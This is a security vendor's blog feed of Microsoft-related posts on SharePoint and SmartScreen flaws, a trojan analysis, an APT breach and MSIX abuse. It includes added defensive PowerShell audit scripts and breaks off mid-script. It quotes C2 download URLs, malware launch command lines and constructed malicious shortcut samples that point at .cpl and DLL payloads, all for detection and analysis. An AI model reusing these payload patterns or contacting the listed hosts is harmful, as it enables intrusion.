Microsoft Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/microsoft/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.

Microsoft SharePoint Vulnerability Exploited, Update Now
https://gridinsoft.com/blogs/microsoft-sharepoint-vulnerability-exploited/
Mon, 01 Apr 2024 13:05:11 +0000

In late March 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert about in-the-wild exploitation of a flaw in Microsoft SharePoint. Technical details of the flaw were published back in September 2023, but evidence of active exploitation surfaced only now. Fortunately, Microsoft has long offered updates that fix it.

Remote code execution vulnerability

A vulnerability tracked as CVE-2023-24955 (CVSS: 7.2) affects Microsoft SharePoint Server, including SharePoint Enterprise Server 2013, SharePoint Server 2016 and SharePoint Server 2019. It is a code injection flaw: an attacker who manages to replace a specific file on the server (/BusinessDataMetadataCatalog/BDCMetadata.bdcm) gets the injected code compiled into an assembly that SharePoint then loads and executes. The net effect is arbitrary code execution on the server.

The vulnerability was originally identified by security researchers who reported it to Microsoft. The exploitation path is a specially crafted web request to the SharePoint server that overwrites the BDC metadata file. One important caveat: on its own, CVE-2023-24955 requires the attacker to already hold Site Owner privileges on the target site. In the published exploit chain it was combined with a separate SharePoint authentication-bypass flaw, CVE-2023-29357 (patched in June 2023), and it is that combination which turns it into an unauthenticated remote code execution attack. A server missing either patch should be treated as exposed.

[Image: SharePoint application authentication module]

Remote code execution flaws are traditionally considered the most severe class. They let an attacker run code of their choosing on the affected host and, from there, reach other systems in the environment, so such flaws serve both as entry points and as instruments for lateral movement. Given how widely Microsoft products are deployed, it is reasonable to expect this vulnerability to be chained with other flaws in the Microsoft ecosystem.

Official Microsoft Patches and Updates

Microsoft fixed the vulnerability in the May 2023 Patch Tuesday, months before its technical details were published. After the public disclosure, the company reiterated its security advisories and the updates for all supported versions of the product, urging users to apply them immediately. The patches are distributed through Microsoft's standard update channels and the official support site. Given the CVSS score and the now-confirmed exploitation, any server still running an unpatched build should have been updated long ago; at this point patching is overdue rather than optional.
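For administrators who want to verify their own farm rather than take the advisory on faith, here is an added audit script (example code, not from the Gridinsoft post or from Microsoft). It checks the farm build against the build that contains the fix and then looks for recent modifications of the BDCMetadata.bdcm file the article names. Assumptions: $PatchedBuild is a placeholder that you must replace with the build number listed in the Microsoft advisory for your SharePoint version; the file is looked up at the web-relative path from the article in the root web of each site collection; the script runs in the SharePoint Management Shell on a farm server as a farm administrator.

```powershell
# Added example: audit a SharePoint farm for CVE-2023-24955 exposure.
# Not part of the original article. Run in the SharePoint Management Shell as a farm admin.
param(
    # PLACEHOLDER: replace with the patched build number from the Microsoft advisory for your version.
    [version]$PatchedBuild = '0.0.0.0',
    # Look-back window for BDCMetadata.bdcm modifications (a choice, not an article value).
    [int]$ModifiedWithinDays = 90
)

if (-not (Get-PSSnapin -Name Microsoft.SharePoint.PowerShell -ErrorAction SilentlyContinue)) {
    Add-PSSnapin Microsoft.SharePoint.PowerShell
}

# 1. Is the farm on a build that contains the May 2023 fix?
$build = (Get-SPFarm).BuildVersion
if ($build -lt $PatchedBuild) {
    Write-Warning "Farm build $build is older than patched build $PatchedBuild - apply the May 2023 (or later) update."
} else {
    Write-Output "Farm build $build is at or above $PatchedBuild."
}

# 2. Has anyone recently overwritten BDCMetadata.bdcm in any site collection?
#    Assumption: the file lives at this web-relative path (taken from the article) in the root web.
$bdcPath = 'BusinessDataMetadataCatalog/BDCMetadata.bdcm'
$cutoff  = (Get-Date).AddDays(-$ModifiedWithinDays)

$findings = foreach ($site in Get-SPSite -Limit All) {
    try {
        $file = $site.RootWeb.GetFile($bdcPath)
        if ($file.Exists -and $file.TimeLastModified -gt $cutoff) {
            [pscustomobject]@{
                Site       = $site.Url
                Modified   = $file.TimeLastModified
                ModifiedBy = if ($file.ModifiedBy) { $file.ModifiedBy.LoginName } else { '(unknown)' }
                SizeBytes  = $file.Length
            }
        }
    } finally {
        $site.Dispose()
    }
}

if ($findings) {
    Write-Warning "BDCMetadata.bdcm was modified within the last $ModifiedWithinDays days on the sites below - verify each change."
    $findings | Format-Table -AutoSize
} else {
    Write-Output "No BDCMetadata.bdcm modifications in the last $ModifiedWithinDays days."
}
```

A modified BDC metadata file is not proof of compromise (administrators do publish BDC models), but on a server that was unpatched during the exposure window, each such change deserves a look at who made it and what the file now contains.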

Other vulnerabilities are rarely patched before they become public. Protecting against those requires a security solution that can recognise exploitation behaviour rather than a known signature. EDR/XDR-class products not only detect the post-exploitation activity that follows a successful attack, but also let you orchestrate the response and contain the damage.


The post Microsoft SharePoint Vulnerability Exploited, Update Now appeared first on Gridinsoft Blog.

Usermode Font Driver Host (fontdrvhost.exe)
https://gridinsoft.com/blogs/usermode-font-driver-host-high-cpu-and-memory/
Thu, 21 Mar 2024 09:14:41 +0000

The Usermode Font Driver Host process is an important part of the Windows operating system. It may raise questions among users due to its high consumption of resources such as CPU and memory. Let’s find out what this process is and whether you can do without it.

What is Usermode Font Driver Host?

The Usermode Font Driver Host process, as its name suggests, handles fonts in user mode: it parses and renders font data so that the system can display text in applications and interfaces. The genuine binary lives in the standard system directory, C:\Windows\System32\fontdrvhost.exe. The process serves font rendering requests from applications, from basic text display to complex formatting in documents and web pages. Its purpose is isolation: font files are untrusted input that older Windows versions parsed inside the kernel, and moving that work into a separate, low-privilege user-mode process means a malformed font can crash or compromise only that process.

[Image: Usermode Font Driver Host process in Task Manager]

If you look for fontdrvhost.exe in Task Manager on a recent Windows build, you will see it running under a user name such as "UMFD-0" or "UMFD-1". UMFD stands for User Mode Font Driver, and the number is the session the instance belongs to (session 0 for services, session 1 for the first interactive logon). Each instance runs under a dedicated virtual account with tightly restricted privileges, which is what confines the process to font work and nothing else.

Usermode Font Driver Host High CPU and Memory Troubleshooting

High consumption of CPU and memory by the Usermode Font Driver Host process can have several causes. The first is legitimate heavy use: graphic editors, design software, or a large number of non-standard fonts being loaded.

Alternatively, increased consumption also can be caused by incorrect operation or failure in the Windows font management system. When corrupted or incorrectly created fonts are installed in the system, Usermode Font Driver Host may consume an excessive amount of resources trying to process or fix them.

Problems with Usermode Font Driver Host may also come from a damaged fontdrvhost.exe binary or one of the system components it depends on. There are two ways to address that: running a system file scan, or updating Windows. Let's start with the least invasive one.

Troubleshooting Step 1: Run System File Checker

Windows ships quite a few built-in repair utilities. For file corruption, the tool to reach for is System File Checker.

  • Open a command prompt as administrator: type cmd in the search box and choose "Run as administrator" to open an elevated Command Prompt.

[Image: cmd in the search box]

  • Type sfc /scannow and press Enter.

[Image: System File Checker]

  • Wait for the scanning process to complete and errors to be corrected.
  • Restart your computer after the scan is complete.

If System File Checker does not solve the problem, it may indicate deeper system irregularities. In such a case, it is recommended to update Windows to replace and update system files, which may fix existing system problems.

Troubleshooting Step 2: Update Windows

Windows Update is an effective remedy when high resource consumption is caused by an incompatibility or a faulty system module. Windows updates contain bug fixes and performance improvements that can resolve existing resource consumption problems, since the developers constantly analyze user reports and diagnostic data to optimize system performance. To check for updates, press the Windows key + I and choose "Windows Update." If any updates are available, download and install them.

[Image: Windows Update]

Troubleshooting Step 3: Removing damaged fonts

As I wrote above, fontdrvhost.exe may consume an excessive amount of resources while trying to process corrupted fonts. Therefore, remove fonts that were installed recently or that may be corrupted.

To do this, go to Control Panel > Fonts.

[Image: Remove fonts]

Then remove fonts that match any of the following:

  • Fonts that do not cover the languages or scripts you actually use
  • Fonts downloaded from unreliable sources
  • Duplicate copies of the same font
  • Fonts that have not been used for a long time

Can I Stop or Disable Usermode Font Driver Host?

The Usermode Font Driver Host is an essential part of Windows and I do not recommend deleting or disabling it. Removing it results in errors in any Windows application that renders text, which is practically all of them: Microsoft Word, Excel, PowerPoint, email clients, messaging apps and many more. I will additionally emphasize that fontdrvhost.exe itself is not malware. Its name, however, can be borrowed: a process called fontdrvhost.exe that runs from any location other than C:\Windows\System32, is not signed by Microsoft, or runs under a normal user account rather than UMFD-n deserves a closer look.
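The two checks the preceding sections call for, verifying that every running fontdrvhost.exe is the genuine Windows binary and finding recently added fonts as candidates for removal, can be scripted. The script below is an added example, not code from the Gridinsoft post. Assumptions: it runs from an elevated PowerShell prompt (needed to read the process owner), the "recent" window of 30 days is a choice rather than something the article specifies, and the user-font location is the per-user folder Windows 10 (1809 and later) uses.

```powershell
# Added example: verify fontdrvhost.exe instances and list recently added fonts.
# Not part of the original article. Run from an elevated PowerShell prompt.
param([int]$RecentDays = 30)   # assumption: 30 days counts as "recently installed"

function Test-FontDriverHost {
    # The only legitimate location of the binary.
    $expectedPath = Join-Path $env:SystemRoot 'System32\fontdrvhost.exe'
    foreach ($p in Get-Process -Name fontdrvhost -IncludeUserName -ErrorAction SilentlyContinue) {
        $path = $p.Path                                  # $null if the process could not be opened
        $sig  = if ($path) { Get-AuthenticodeSignature -FilePath $path } else { $null }
        [pscustomobject]@{
            Pid       = $p.Id
            Session   = $p.SessionId
            User      = $p.UserName                      # expected: Font Driver Host\UMFD-<session>
            Path      = $path
            SigStatus = if ($sig) { $sig.Status } else { 'Unknown' }
            Signer    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '(none)' }
            # All four conditions must hold for the instance to be considered genuine.
            Genuine   = ($path -eq $expectedPath) -and
                        ($sig.Status -eq 'Valid') -and
                        ($sig.SignerCertificate.Subject -like '*Microsoft Windows*') -and
                        ($p.UserName -like 'Font Driver Host\UMFD-*')
        }
    }
}

function Get-RecentlyAddedFont {
    param([int]$Days = 30)
    $cutoff = (Get-Date).AddDays(-$Days)
    $fontDirs = @(
        (Join-Path $env:SystemRoot 'Fonts'),                       # system-wide fonts
        (Join-Path $env:LOCALAPPDATA 'Microsoft\Windows\Fonts')    # per-user fonts (assumed location, Win10 1809+)
    ) | Where-Object { Test-Path $_ }
    Get-ChildItem -Path $fontDirs -Include *.ttf, *.otf, *.ttc, *.fon -Recurse -File |
        Where-Object { $_.CreationTime -gt $cutoff } |
        Sort-Object CreationTime -Descending |
        Select-Object Name, CreationTime, Length, DirectoryName
}

$hosts = Test-FontDriverHost
Write-Output '== fontdrvhost.exe instances =='
$hosts | Format-Table -AutoSize
$hosts | Where-Object { -not $_.Genuine } | ForEach-Object {
    Write-Warning "fontdrvhost.exe PID $($_.Pid) fails one of the genuineness checks (path, signature or account) - investigate."
}

Write-Output "== Fonts added in the last $RecentDays days (removal candidates) =="
Get-RecentlyAddedFont -Days $RecentDays | Format-Table -AutoSize
```

The signature check relies on Get-AuthenticodeSignature resolving the catalog signature that Windows system binaries carry; a Status other than Valid on the real System32 path usually points to file corruption, which is exactly the case where the sfc /scannow step above applies.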

Trojan:Win32/Vigorf.A
https://gridinsoft.com/blogs/trojanwin32-vigorf-a-analysis-removal/
Mon, 18 Mar 2024 21:53:27 +0000

Trojan:Win32/Vigorf.A is a generic detection of Microsoft Defender. It commonly identifies a running loader malware that can do significant harm to the system. In this article, let's find out how dangerous Vigorf.A is and how to get rid of it.

What is Trojan:Win32/Vigorf.A?

Trojan:Win32/Vigorf.A is the detection name that Microsoft Defender assigns to dropper/loader malware. Being generic, it covers a whole range of malicious programs rather than one specific family. The goal of Vigorf.A is to gain unauthorized access to the system and to deliver further malware. As my detailed analysis has shown, Trojan:Win32/Vigorf.A uses various methods to bypass antivirus programs and operating system protection.

[Image: Trojan:Win32/Vigorf.A detection]

Usually, this malware downloads or installs other malicious programs on the computer. It drops its files and modifies system settings and configuration files to gain persistence. It also connects to remote servers to send the information it collects and to download additional malicious programs.

Is Trojan:Win32/Vigorf.A False Positive?

False positives under the Vigorf.A name are not common. There are only a few cases discussed online, and all of them involve software that borders on malicious.

[Image: User complaints about false positive detection]

The most common case is game modifiers and patches. Such tools modify game memory or files to unlock features and can be misidentified as Trojan:Win32/Vigorf.A because of the way they intrude into other programs' memory. Similar tools and scripts used by software developers can be flagged for the same reason. Such software may well be legitimate, but it is still worth treating with care.

Vigorf.A Trojan Analysis

Studying the behavior of a Trojan:Win32/Vigorf.A sample on an infected system showed me how elaborate these threats can be. Not only does the trojan collect personal user data, it also modifies system settings, weakening the system's defences and opening the door for other malware.

Methods of Distribution

Trojan:Win32/Vigorf.A is often spread via spam e-mail campaigns with malicious attachments or links. Once the user opens the attachment or clicks the link, the trojan is installed on the computer, either directly or through a loader script. Despite being used for malware distribution for years, email spam remains a particularly potent and effective vector.

[Image: Email spamming example]

Malvertising is another tricky method that, as far as my research goes, has been used to spread Trojan:Win32/Vigorf.A. The operators abuse ad networks to place malicious ads in search engine results. Such ads redirect users to malicious copies of familiar sites or download malware onto their devices directly.

[Image: Fake LibreOffice ad that tries to mimic the original site's URL]

In addition, Vigorf.A is often hidden in packages containing illegal or pirated software. When a user downloads and installs such a program, the trojan is installed alongside it. Such software is attractive because it is offered for free, but it ends up costing far more because of the damage the trojan causes.

Launch, Gaining Persistence and Data Collection

After launching, Trojan:Win32/Vigorf.A adds itself to autorun by placing a shortcut in the Startup folder, so that it starts every time the user logs on. In my case, I found a strange shortcut named adxjcv4.lnk, which turned out to be associated with the trojan:

%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\adxjcv4.lnk

Alternatively, Vigorf.A may rely on DLL hijacking. This happens particularly often when the malware arrives with a loader that unpacks the sample and handles the launch. The launch itself is nothing unusual: a PowerShell command that runs the malware DLL through a call to rundll32.exe. Note that advpack.dll, the library named in the command below, is a legitimate, Microsoft-signed system DLL, so the process name alone looks benign; what matters for detection is which export is invoked and with what arguments, which is why rundll32.exe command lines should always be logged in full.

rundll32.exe %windir%\system32\advpack.dll

After the launch, the malware geolocates the system by its public IP address and then collects system data. This lets Vigorf.A distinguish the particular machine from others and can serve more targeted attacks or simply build an exhaustive profile of the victim. In particular, it reads the following UserAssist keys, in which Windows Explorer records the programs the user has launched (value names are ROT13-encoded, and each value stores a run count and a last-execution timestamp), to learn which programs are present on the PC:

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count

HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}\Count

By reading the next two keys, Trojan:Win32/Vigorf.A learns about the networks the computer has connected to and the intranet zones it trusts, and can single out the most promising points for further attacks. This information helps the operators deploy follow-up malware where it pays most and extract extra profit from other systems on the same network.

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache\Intranet

HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect

C2 Communications and Malware Delivery

After collecting all this data, Vigorf encrypts it and sends it to the command server in an HTTP POST request. The list of command servers was hard-coded in the samples I worked with, but this may differ in other cases. The server responds with a blob of data that tells the malware what to do next. For a dropper, payload delivery is obviously the most likely instruction.

To order a payload, the C2 sends the URLs Vigorf should download it from. The sample then issues HTTP GET requests to the following addresses:

http[:]//185.117.75.198/fiscal/1
http[:]//194.163.43.166/08/st/m.zip

Files downloaded from these addresses were disguised as ordinary documents or incomplete files, making them harder to spot and analyze. Once Vigorf finishes downloading the payload, it launches it through a process named wuapp.exe. The name matches a Windows system utility, so the usual caveat applies: check the image path and signature of the process that actually runs rather than trusting the name.

"C:\Windows\System32\wuapp.exe" -c "C:\ProgramData\sHrhJDaCBu\cfg"
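The artifacts described in this section (a Startup-folder shortcut, the UserAssist keys the trojan reads, and connections to the listed C2 addresses) can be triaged on a suspect host with the script below. It is an added example, not code from the Gridinsoft post or from the malware analysis. Assumptions: the UserAssist values are in the 72-byte layout Windows 7 and later use (run count at offset 4, last-run FILETIME at offset 60); the IOC address list is taken from the article and should be extended with your own intelligence; a shortcut target under AppData, ProgramData or Temp is flagged as a heuristic, not a verdict.

```powershell
# Added example: triage a host for the Vigorf.A artifacts described above.
# Not part of the original article. Run in an interactive PowerShell session on the suspect host.

$IocAddresses = @('185.117.75.198', '194.163.43.166')   # C2 hosts listed in the article

function ConvertFrom-Rot13 {
    # UserAssist value names are ROT13-encoded; rotate letters, leave everything else alone.
    param([string]$Text)
    $chars = $Text.ToCharArray() | ForEach-Object {
        $c = [int]$_
        if     ($c -ge 65 -and $c -le 90)  { [char](($c - 65 + 13) % 26 + 65) }
        elseif ($c -ge 97 -and $c -le 122) { [char](($c - 97 + 13) % 26 + 97) }
        else   { $_ }
    }
    -join $chars
}

function Get-StartupShortcut {
    # Per-user and all-users Startup folders; the article's sample used the per-user one.
    $dirs = @(
        (Join-Path $env:APPDATA     'Microsoft\Windows\Start Menu\Programs\Startup'),
        (Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs\StartUp')
    )
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $dirs -Filter *.lnk -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk = $shell.CreateShortcut($_.FullName)
        [pscustomobject]@{
            Shortcut   = $_.FullName
            Created    = $_.CreationTime
            Target     = $lnk.TargetPath
            Arguments  = $lnk.Arguments
            # Heuristic (assumption): real software rarely autostarts from these writable locations.
            Suspicious = $lnk.TargetPath -match '\\(AppData|ProgramData|Temp)\\'
        }
    }
}

function Get-UserAssistEntry {
    # The two GUIDs from the article: executable launches and shortcut (.lnk) launches respectively.
    $guids = '{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}', '{F4E57C4B-2036-45F0-A9AB-443BCFE33D9F}'
    foreach ($g in $guids) {
        $key = Get-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\$g\Count" -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        foreach ($name in $key.GetValueNames()) {
            $bytes = $key.GetValue($name)
            if ($bytes -isnot [byte[]] -or $bytes.Length -lt 68) { continue }   # skip non-standard layouts
            $ft = [BitConverter]::ToInt64($bytes, 60)                           # assumed offset of last-run FILETIME
            [pscustomobject]@{
                Program  = ConvertFrom-Rot13 $name
                RunCount = [BitConverter]::ToInt32($bytes, 4)                   # assumed offset of run count
                LastRun  = if ($ft -gt 0) { [DateTime]::FromFileTime($ft) } else { $null }
                Source   = $g
            }
        }
    }
}

function Get-IocConnection {
    Get-NetTCPConnection -ErrorAction SilentlyContinue |
        Where-Object { $IocAddresses -contains $_.RemoteAddress } |
        Select-Object LocalAddress, LocalPort, RemoteAddress, RemotePort, State, OwningProcess
}

Write-Output '== Startup folder shortcuts =='
Get-StartupShortcut | Format-Table -AutoSize

Write-Output '== UserAssist execution history (most recent first, top 25) =='
Get-UserAssistEntry | Sort-Object LastRun -Descending | Select-Object -First 25 | Format-Table -AutoSize

Write-Output '== Live connections to the listed C2 addresses =='
$hits = Get-IocConnection
if ($hits) { $hits | Format-Table -AutoSize } else { Write-Output 'None.' }
```

The UserAssist decode is useful in both directions: it shows the same execution history the trojan harvests, and it also tells you when the dropped shortcut or the payload was first run, which anchors the rest of the timeline.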

How to Remove Trojan:Win32/Vigorf.A?

To remove Trojan:Win32/Vigorf.A, I recommend using GridinSoft Anti-Malware. It will detect and remove Vigorf.A along with any other malicious programs it has downloaded. It can also run alongside Windows Defender as an additional line of defense.


It is important to run a Full Scan and remove all detected threats. I would also recommend keeping the system and all programs updated to the latest versions to eliminate vulnerabilities that malware can exploit.

Microsoft is Hacked, Again by Midnight Blizzard
https://gridinsoft.com/blogs/microsoft-hacked-again-midnight-blizzard/
Sat, 09 Mar 2024 10:08:13 +0000

Microsoft has acknowledged being hacked for the second time this year, by the same Russian state-sponsored group, Midnight Blizzard. The company confirms that the new breach grew out of the previous one: the attackers used authentication secrets they obtained during the earlier intrusion.

Microsoft Hacked, Source Code Leaked

In its 8-K filing to the SEC, Microsoft links the latest intrusion to the one uncovered in January 2024. The Russian threat actor known as Nobelium/Midnight Blizzard had broken into Microsoft systems around November 2023 and stayed inside until January, eventually gaining access to the emails of executives and to certain authentication material. It turns out that the attackers walked away with authentication secrets that remained usable even after they were discovered.

In the latest activity, Midnight Blizzard used these leaked secrets to get into Microsoft's internal systems once again. The same 8-K filing discloses that the attackers accessed, or at least attempted to access, source code repositories and other internal systems using those keys. Microsoft warns that further unauthorized access may occur, which implies that it does not yet know the full extent of the secrets that were taken.

The threat actor’s ongoing attack is characterized by a sustained, significant commitment of the threat actor’s resources, coordination, and focus. Our active investigations of the threat actor’s activities are ongoing, findings of our investigations will continue to evolve, and further unauthorized access may occur.
Microsoft, in its 8-K filing

One fortunate thing is that, according to Microsoft, customer-facing systems and customer data were not compromised. That is plausible, since the earlier intrusion concentrated on top-tier executives, who rarely have access to customer data. And it is a big relief: the downstream attacks enabled by data leaked from Azure, Outlook or other cloud services could have been tremendous. Still, that is no excuse for a company of this size to fall victim to hackers.

Who is Midnight Blizzard?

Midnight Blizzard, in Microsoft's current naming, is the group also tracked as Nobelium, APT29 and Cozy Bear. It is a Russian state-sponsored threat actor attributed to the Foreign Intelligence Service (SVR) and focused on cyber espionage. The group is known for high-profile targets: government agencies, military contractors and the like.

Microsoft became their point of interest back in 2022, when they managed to hack an auxiliary SSO system for Windows Server. The November 2023 intrusion was the first "proper" one: APT29 stayed in the network for a considerable time and compromised a range of internal systems. Given the uncertainty about how much was compromised, further attempts are all but certain.

Windows SmartScreen Vulnerability Exploited to Spread Phemedrone Stealer
https://gridinsoft.com/blogs/windows-smartscreen-vulnerability-phemedrone-stealer/
Fri, 12 Jan 2024 21:58:53 +0000

A malicious campaign exploits CVE-2023-36025, a vulnerability in Microsoft Windows Defender SmartScreen, to spread Phemedrone Stealer. It uses layered evasion techniques to slip past traditional security controls and goes after sensitive user information.

Phemedrone Stealer Campaign Exploits CVE-2023-36025

Trend Micro researchers uncovered a malware campaign exploiting CVE-2023-36025 in Microsoft Windows Defender SmartScreen. The campaign delivers Phemedrone Stealer, which can extract a wide range of sensitive data. Its infection chain begins with malicious Internet Shortcut (.url) files hosted in the cloud, often hidden behind URL shorteners. When opened, these files exploit CVE-2023-36025 to kick off the malware download.

The campaign itself is concentrated on social media. The attackers spread .url files that look like innocent link shortcuts. Opening one starts a chain that fetches the loader and its shellcode from a GitHub repository the attackers control. Lures on such platforms are nothing new; what makes this one effective is the use of .url files, which act as a lockpick against user trust, spam filters and system protection all at once.

CVE-2023-36025: A Gateway for Cybercriminals

In a nutshell, CVE-2023-36025 is a critical vulnerability in Microsoft Windows Defender SmartScreen. It allows attackers to bypass the security warnings and checks normally applied to Internet Shortcut (.url) files by crafting them in a particular way. Despite the patch Microsoft released on November 14, 2023, cybercriminals have actively exploited the vulnerability, which led to its inclusion in the Cybersecurity and Infrastructure Security Agency's (CISA) Known Exploited Vulnerabilities (KEV) list.

In the Phemedrone campaign, the attackers evade Windows Defender SmartScreen with a Control Panel item (.cpl) file. Normally, SmartScreen warns you before a downloaded Internet Shortcut is allowed to run its target; a specially crafted .url file bypasses that check, so the referenced .cpl item is executed through the Windows Control Panel binary without any prompt while the malicious download proceeds in the background.

Detailed Analysis

Attackers spread Phemedrone Stealer using cloud hosting and URL shorteners. They exploit CVE-2023-36025 by tricking users into opening .url files, and evade Windows Defender SmartScreen by having the shortcut launch a .cpl file through the Control Panel binary (MITRE ATT&CK technique T1218.002, System Binary Proxy Execution: Control Panel). The .cpl file is a DLL loader that calls Windows PowerShell to download the next stage from GitHub. That second-stage loader, Donut, can execute various types of files in memory; the final payload, Phemedrone Stealer, targets multiple applications and services to steal sensitive information.

[Image: Phemedrone Stealer's infection chain]

The malware collects system information and compresses it into a ZIP archive using the MemoryStream and ZipStorage classes. It then validates the Telegram bot API token and sends the compressed data to the attacker via its SendMessage and SendZip methods; SendZip uses an HTTP POST request to upload the archive as a document through the Telegram API.
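A practical way to hunt for the shortcut described in the two sections above is to look at what the URL= line of each .url file actually points to: an ordinary web page is one thing, a .cpl or other executable reached over a file://, UNC or WebDAV path is another. The script below is an added example, not code from the Gridinsoft post or from Trend Micro's analysis. Assumptions: the scan folder defaults to the user's Downloads directory; the three sample shortcuts it writes to a temp folder are constructed for the demonstration, with made-up paths and documentation-range IP addresses; the "raw IP host" and extension heuristics are the script's own, not indicators from the campaign.

```powershell
# Added example: flag Internet Shortcut (.url) files whose target is an executable payload
# rather than a web page, the pattern abused in CVE-2023-36025. Not part of the original article.
param([string]$ScanPath = (Join-Path $env:USERPROFILE 'Downloads'))   # assumption: where downloads land

function Get-UrlShortcutTarget {
    # .url files are INI-style text; the target is the URL= line in the [InternetShortcut] section.
    param([string]$Path)
    foreach ($line in Get-Content -Path $Path -ErrorAction Stop) {
        if ($line -match '^\s*URL\s*=\s*(.+?)\s*$') { return $Matches[1] }
    }
    return $null
}

function Test-SuspiciousUrlShortcut {
    param([string]$Path)
    $target  = Get-UrlShortcutTarget -Path $Path
    $reasons = @()
    if (-not $target) {
        $reasons += 'no URL= entry'
    } else {
        # A remote file, UNC share or WebDAV path instead of an http(s) page.
        if ($target -match '^(file:|\\\\|//)') { $reasons += 'target is a file/UNC/WebDAV path' }
        # An executable artifact as the target, whatever the scheme.
        if ($target -match '\.(cpl|exe|dll|msi|scr|js|vbs|hta)(\?|#|$)') { $reasons += 'target is an executable payload' }
        if ($target -match '\.cpl(\?|#|$)') { $reasons += 'Control Panel item (.cpl), the CVE-2023-36025 pattern' }
        # Heuristic (assumption): throw-away infrastructure is often addressed by raw IP.
        if ($target -match '^[a-z]+:/*\d{1,3}(\.\d{1,3}){3}') { $reasons += 'raw IP address host' }
    }
    [pscustomobject]@{
        File       = $Path
        Target     = $target
        Suspicious = $reasons.Count -gt 0
        Reasons    = $reasons -join '; '
    }
}

# Constructed sample shortcuts (made-up hosts and paths), written to a temp folder for the demo.
$demo = Join-Path $env:TEMP 'url-shortcut-demo'
New-Item -ItemType Directory -Path $demo -Force | Out-Null
$samples = @{
    'benign.url'     = "[InternetShortcut]`r`nURL=https://example.com/docs/readme.html"
    'remote-cpl.url' = "[InternetShortcut]`r`nURL=file://203.0.113.10/share/payload.cpl"
    'webdav-dll.url' = "[InternetShortcut]`r`nURL=\\203.0.113.10@80\DavWWWRoot\loader.dll"
}
foreach ($entry in $samples.GetEnumerator()) {
    Set-Content -Path (Join-Path $demo $entry.Key) -Value $entry.Value
}

$roots = if (Test-Path $ScanPath) { @($ScanPath, $demo) } else { @($demo) }
Get-ChildItem -Path $roots -Filter *.url -Recurse -File -ErrorAction SilentlyContinue |
    ForEach-Object { Test-SuspiciousUrlShortcut -Path $_.FullName } |
    Sort-Object Suspicious -Descending |
    Format-Table File, Suspicious, Reasons, Target -AutoSize -Wrap
```

Of the three constructed samples only benign.url passes; the other two are flagged for the path type, the executable extension and the raw IP host. On a real Downloads folder, treat any hit as something to open in a text editor, never by double-clicking.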

Mitigation and Recommendations

In light of this threat, where attackers weaponize vulnerabilities faster than users install the fixes, a few recommendations:

  • Regularly update your OS, apps, and security solution. This action is crucial as developers continuously address security vulnerabilities through patches. Although the process may seem tedious, it is a necessary and proactive measure to ensure that your operating system, applications, and security solutions are equipped with the latest defenses against evolving cyber threats.
  • Be cautious with Internet Shortcut (.url) files. Exercise caution, especially when dealing with Internet Shortcut files, particularly those received from unverified sources. These files can serve as gateways for malware, making it essential to pay attention to the legitimacy of URLs before opening them to mitigate the risk of infection.
  • Implement advanced security solutions. This measure detects and neutralizes malware if it infiltrates your device. Robust security software with real-time monitoring and threat detection capabilities adds an extra layer of protection, helping identify and promptly respond to potential threats.
  • Stay informed about the risks of phishing and social engineering. These tactics often serve as the initial vectors for malware campaigns. Educate yourself and your team on recognizing phishing attempts, avoiding suspicious links, and verifying the authenticity of communications to minimize the likelihood of falling victim to such cyber threats.

Microsoft Disables MSIX App Installer Protocol
https://gridinsoft.com/blogs/microsoft-disables-msix-app-installer-protocol/
Tue, 02 Jan 2024 09:38:57 +0000

Microsoft has reportedly disabled the ms-appinstaller protocol handler in Windows because of its exploitation in real-world attacks. Criminals found a way to misuse the protocol to install malicious software while bypassing anti-malware detection and download warnings.

MSIX Installer Protocol Exploited

A market of malware kits that exploit the MSIX file format and the ms-appinstaller protocol is nothing new. In this case, however, the kit, sold as a service, lets attackers leverage weaknesses in the protocol to distribute malware, including ransomware.

As a reminder, MSIX is an application packaging format introduced with Windows 10. A package is described by an XML manifest in which developers declare how deployment works, which files are needed and where they come from. The root of the problem is that MSIX packages can be installed straight from the Internet through the ms-appinstaller protocol handler. A link of the form ms-appinstaller:?source=https://website.com/file.appx makes App Installer fetch and install the package, and a malicious package installs malware in exactly the same way.

[Image: Attack using App Installer]

As for the modus operandi, the crooks used signed malicious MSIX application packages disguised as legitimate software to get into systems. The packages are spread through various channels, in this case Microsoft Teams messages and deceptive advertisements on popular search engines. Because the package is signed and installed by a trusted system component, the attack sidesteps controls such as Microsoft Defender SmartScreen and browser download warnings, which makes it harder to detect and prevent.

Multiple threat groups have been exploiting the App Installer service since mid-November 2023, distributing malware through fake installers and landing pages. Notable among them are Storm-0569, Storm-1113, Sangria Tempest and Storm-1674.

Microsoft Blocks MSIX Installer

This is not the first time Microsoft has faced abuse of this installation path. In February 2022, Microsoft disabled the protocol after Emotet, TrickBot and BazaLoader exploited it. The vulnerability used back then was somewhat different, but it led to nearly the same effect: drive-by malware installation.

This time, Microsoft recommends installing App Installer version 1.21.3421.0 or later, which disables the ms-appinstaller protocol handler by default and so removes the abuse path. Administrators who cannot update immediately are advised to disable the protocol via Group Policy by setting EnableMSAppInstallerProtocol to Disabled.
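The two controls just described can be checked, and the policy one applied, with the script below. It is an added example, not code from the Gridinsoft post or from Microsoft. Assumptions: the Group Policy setting is persisted as a DWORD named EnableMSAppInstallerProtocol under HKLM\SOFTWARE\Policies\Microsoft\Windows\AppInstaller (0 = disabled), App Installer is the Microsoft.DesktopAppInstaller package, the HKCR\ms-appinstaller lookup is informational only, and the -Enforce switch is this script's own. It must run elevated.

```powershell
# Added example: check a host for ms-appinstaller protocol exposure and optionally disable it by policy.
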